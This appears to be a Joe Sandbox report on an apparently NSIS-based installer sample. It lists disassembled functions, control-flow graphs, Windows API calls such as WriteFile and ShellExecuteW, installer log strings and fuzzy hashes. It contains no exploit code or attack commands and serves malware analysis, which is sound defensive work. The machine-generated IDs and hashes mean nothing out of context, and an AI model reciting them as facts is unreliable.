                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                              • API String ID: 4286501637-2478300759
                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                              Control-flow Graph (graph rendering not reproduced; function starting at 004035B3, basic blocks 4035b3-4037f6, nodes marked Executed / Not Executed in the original)
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                              Strings
                                                                                              • f%o, xrefs: 00403632
                                                                                              • Error launching installer, xrefs: 00403603
                                                                                              • Inst, xrefs: 00403698
                                                                                              • soft, xrefs: 004036A1
                                                                                              • Null, xrefs: 004036AA
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$f%o$soft
                                                                                              • API String ID: 4283519449-775354024
                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,004241C1,00403792,00000000), ref: 004034FF
                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                              • String ID: (]C$... %d%%$pAB
                                                                                              • API String ID: 651206458-3635341587
                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                              • lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2740478559-0
                                                                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGloballstrcpyn
                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                              • API String ID: 1459762280-1711415406
                                                                                              • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                              • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3376005127-0
                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Control-flow Graph
control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
• API String ID: 247603264-1827671502
• Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
• Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Control-flow Graph
control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
• Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
• Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Control-flow Graph
control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
• Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
• Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
• Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
• Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
• Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
